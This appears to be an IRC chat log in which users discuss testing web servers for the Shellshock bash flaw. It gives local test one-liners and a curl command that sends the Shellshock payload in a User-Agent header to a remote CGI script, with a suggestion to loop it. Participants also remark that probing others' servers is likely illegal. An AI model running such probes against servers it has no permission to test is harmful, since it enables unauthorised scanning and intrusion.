is there a shell based utility to test bash vulnerability of remote web servers?
there's a command you can run to test it
well, a number of them i guess
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
that's one
mnathani: Since it varies by path (eg, I can't just open :443 and throw packets at it), to my knowledge no such utility is really useful
mnathani: But you can throw it in a curl pretty easily, since that's all it takes
something like curl -A "env x='() { :;}; echo vulnerable' bash -c \"echo this is a test\"" http://server/insecure.cgi
throw that into a loop even
up_the_irons: *bump* ticket (not that it's urgent, but want to make sure you've seen it)
(yes I got the autoresponder, so I know it's been received)
oh, i misinterpreted it - just assumed remote webservers meant boxes in your control with shell access
env X="() { :;} ; echo shellshock" `which bash` -c "echo completed"
this is what i use to test it
if it says shellshock it's vulnerable
oh that's basically the same as what you said
Almost verbatim :P
but basically all bash instances are vulnerable. testing on server is good enough
don't need to test remote vulnerable
update bash on *all* systems
I think the scenario is that mnathani wants to be able to tell Google (for example) their server needs updating, hence the "of remote web servers"
oh right
Where "Google" is probably replaced by acquaintances, clients, sales prospects, etc
that's probably illegal here
i dunno what it's like there.
Grey area, as all pen-testing tends to be without documents